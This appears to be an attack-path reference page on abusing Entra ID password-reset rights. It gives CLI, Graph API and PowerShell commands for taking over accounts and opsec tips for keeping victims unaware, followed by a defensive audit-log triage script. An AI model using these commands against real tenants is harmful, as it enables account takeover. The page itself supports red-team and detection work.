AZResetPassword
The source principal can reset the password of the target Entra ID user account.
Applies to: User / ServicePrincipal / Group → AZUser
Linux Abuse
Azure CLI
# The identity you log in as must hold an Entra role that may reset the target's
# password (Password Administrator, Helpdesk Administrator, User Administrator, ...).
# Targets that themselves hold privileged roles can only be reset by Global
# Administrator or Privileged Authentication Administrator.
az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>
az ad user update --id <target-user-upn> \
    --password '<new-password>' \
    --force-change-password-next-sign-in false
Graph API (curl)
# Get an app-only token first. For an app-only caller, updating passwordProfile
# requires the User-PasswordProfile.ReadWrite.All application permission (or the
# app being assigned a password-reset-capable Entra role).
TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')
# A successful reset returns 204 No Content with an empty body, so print the
# status code to confirm it worked.
curl -s -X PATCH "https://graph.microsoft.com/v1.0/users/<target-user-id>" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -o /dev/null -w '%{http_code}\n' \
  -d '{
    "passwordProfile": {
      "password": "<new-password>",
      "forceChangePasswordNextSignIn": false
    }
  }'
Windows Abuse
Microsoft.Graph PowerShell
# Microsoft.Graph SDK v2 takes the token as a SecureString, not plain text
Connect-MgGraph -AccessToken (ConvertTo-SecureString '<access-token>' -AsPlainText -Force)
Update-MgUser -UserId <target-user-id> `
-PasswordProfile @{
Password = "<new-password>"
ForceChangePasswordNextSignIn = $false
}
PowerZure
Set-AzureUserPassword -Username <target-user-upn> -Password '<new-password>'
Az PowerShell (interactive)
Connect-AzAccount
# Az PowerShell has no cmdlet for resetting another user's password: the
# PSADPasswordCredential type is for application/service principal credentials,
# not user accounts. Use the portal, the Microsoft.Graph module above, or the
# legacy (retired) AzureAD module:
Connect-AzureAD
Set-AzureADUserPassword -ObjectId <target-user-id> `
    -Password (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) `
    -ForceChangePasswordNextLogin $false
Opsec
- Every administrative password reset is written to the Entra ID audit log (activity "Reset user password", category UserManagement) with the initiating user or app, the target UPN and a timestamp. There is no variant of this edge that avoids that record.
- Prefer service principal auth over interactive login to avoid MFA prompts on the source principal; for app-only callers the app needs the User-PasswordProfile.ReadWrite.All application permission or a password-reset-capable role.
- Setting forceChangePasswordNextSignIn = false avoids forcing the victim to change the password on first use, so the attacker's password keeps working. It does not hide the reset: the legitimate user is locked out regardless, and a reset revokes the user's refresh tokens, so they are prompted to sign in again on every device and will usually open a helpdesk ticket anyway. Time the reset for when the target is unlikely to sign in.
- A new password does not satisfy MFA. If the target has registered methods or Conditional Access requires MFA, this edge alone does not get you a session.
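Since the audit log is the one artifact this edge always leaves, the following is an added example of triaging that log from the defender's side; it is not code from BloodHound, PowerZure or Microsoft. The record fields follow the Microsoft Graph directoryAudit shape (activityDisplayName, result, initiatedBy, targetResources); the records in SAMPLE_AUDIT_JSON, the watchlist and the burst threshold are constructed for this example. It flags resets initiated by a service principal (the opsec recommendation above), resets of watchlisted accounts, and bursts of resets by one initiator.

```python
"""Triage Entra ID directoryAudit records for administrative password resets.

Added example, not project code. Field names follow the Graph directoryAudit
resource; sample records, watchlist and thresholds are constructed.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Activity name Entra ID writes for a reset performed through the admin API
# (the path every command on this page uses). SSPR logs under other names.
RESET_ACTIVITY = "Reset user password"

# Hypothetical watchlist of accounts whose reset should always page someone.
WATCHLIST = {"ga-admin@contoso.onmicrosoft.com"}

# Constructed sample of the "value" array from GET /auditLogs/directoryAudits,
# trimmed to the fields the triage uses.
SAMPLE_AUDIT_JSON = """[
 {"activityDateTime":"2024-05-01T10:00:00Z","activityDisplayName":"Reset user password","result":"success",
  "initiatedBy":{"user":null,"app":{"appId":"11111111-1111-1111-1111-111111111111","displayName":"hr-sync-app"}},
  "targetResources":[{"type":"User","userPrincipalName":"alice@contoso.onmicrosoft.com"}]},
 {"activityDateTime":"2024-05-01T10:01:30Z","activityDisplayName":"Reset user password","result":"success",
  "initiatedBy":{"user":null,"app":{"appId":"11111111-1111-1111-1111-111111111111","displayName":"hr-sync-app"}},
  "targetResources":[{"type":"User","userPrincipalName":"bob@contoso.onmicrosoft.com"}]},
 {"activityDateTime":"2024-05-01T10:03:00Z","activityDisplayName":"Reset user password","result":"success",
  "initiatedBy":{"user":null,"app":{"appId":"11111111-1111-1111-1111-111111111111","displayName":"hr-sync-app"}},
  "targetResources":[{"type":"User","userPrincipalName":"carol@contoso.onmicrosoft.com"}]},
 {"activityDateTime":"2024-05-01T11:00:00Z","activityDisplayName":"Reset user password","result":"success",
  "initiatedBy":{"user":{"userPrincipalName":"helpdesk@contoso.onmicrosoft.com","ipAddress":"203.0.113.10"},"app":null},
  "targetResources":[{"type":"User","userPrincipalName":"dave@contoso.onmicrosoft.com"}]},
 {"activityDateTime":"2024-05-01T12:00:00Z","activityDisplayName":"Reset user password","result":"success",
  "initiatedBy":{"user":{"userPrincipalName":"helpdesk@contoso.onmicrosoft.com","ipAddress":"203.0.113.10"},"app":null},
  "targetResources":[{"type":"User","userPrincipalName":"ga-admin@contoso.onmicrosoft.com"}]},
 {"activityDateTime":"2024-05-01T12:30:00Z","activityDisplayName":"Reset user password","result":"failure",
  "initiatedBy":{"user":{"userPrincipalName":"helpdesk@contoso.onmicrosoft.com","ipAddress":"203.0.113.10"},"app":null},
  "targetResources":[{"type":"User","userPrincipalName":"erin@contoso.onmicrosoft.com"}]},
 {"activityDateTime":"2024-05-01T13:00:00Z","activityDisplayName":"Update user","result":"success",
  "initiatedBy":{"user":{"userPrincipalName":"helpdesk@contoso.onmicrosoft.com","ipAddress":"203.0.113.10"},"app":null},
  "targetResources":[{"type":"User","userPrincipalName":"frank@contoso.onmicrosoft.com"}]}
]"""


def load_records(text):
    """Parse a directoryAudits export (the JSON array of records)."""
    return json.loads(text)


def parse_time(value):
    # Graph emits RFC 3339 with a trailing Z; fromisoformat wants an explicit offset.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def initiator(record):
    """Return (kind, name): 'app' for a service principal, 'user' for a human."""
    by = record.get("initiatedBy") or {}
    if by.get("app"):
        return "app", by["app"].get("displayName") or by["app"].get("appId")
    if by.get("user"):
        return "user", by["user"].get("userPrincipalName")
    return "unknown", None


def target_upns(record):
    return [t["userPrincipalName"] for t in record.get("targetResources", [])
            if t.get("type") == "User" and t.get("userPrincipalName")]


def find_resets(records, watchlist=WATCHLIST, window=timedelta(minutes=10), burst=3):
    """Return one alert per (reset, target) matching any rule, in log order."""
    resets = [r for r in records
              if r.get("activityDisplayName") == RESET_ACTIVITY and r.get("result") == "success"]
    # Burst rule: `burst` or more successful resets by one initiator within `window`.
    times = defaultdict(list)
    for r in resets:
        times[initiator(r)].append(parse_time(r["activityDateTime"]))
    watch = {w.lower() for w in watchlist}
    alerts = []
    for r in resets:
        kind, name = initiator(r)
        when = parse_time(r["activityDateTime"])
        nearby = sum(1 for t in times[(kind, name)] if abs(t - when) <= window)
        for target in target_upns(r):
            reasons = []
            if kind == "app":
                reasons.append("reset initiated by service principal")
            if target.lower() in watch:
                reasons.append("target on privileged watchlist")
            if nearby >= burst:
                reasons.append(f"{nearby} resets by same initiator within "
                               f"{int(window.total_seconds() // 60)} min")
            if reasons:
                alerts.append({"time": r["activityDateTime"], "initiator_type": kind,
                               "initiator": name, "target": target, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in find_resets(load_records(SAMPLE_AUDIT_JSON)):
        print(a["time"], a["initiator_type"], a["initiator"], "->", a["target"],
              "|", "; ".join(a["reasons"]))
```

On the constructed sample this yields four alerts: the three app-initiated resets (each also tripping the burst rule) and the helpdesk reset of the watchlisted admin; the single routine helpdesk reset, the failed reset and the unrelated "Update user" event produce nothing. Failed resets are dropped on purpose here, but a run of failures from one initiator is itself worth a separate rule.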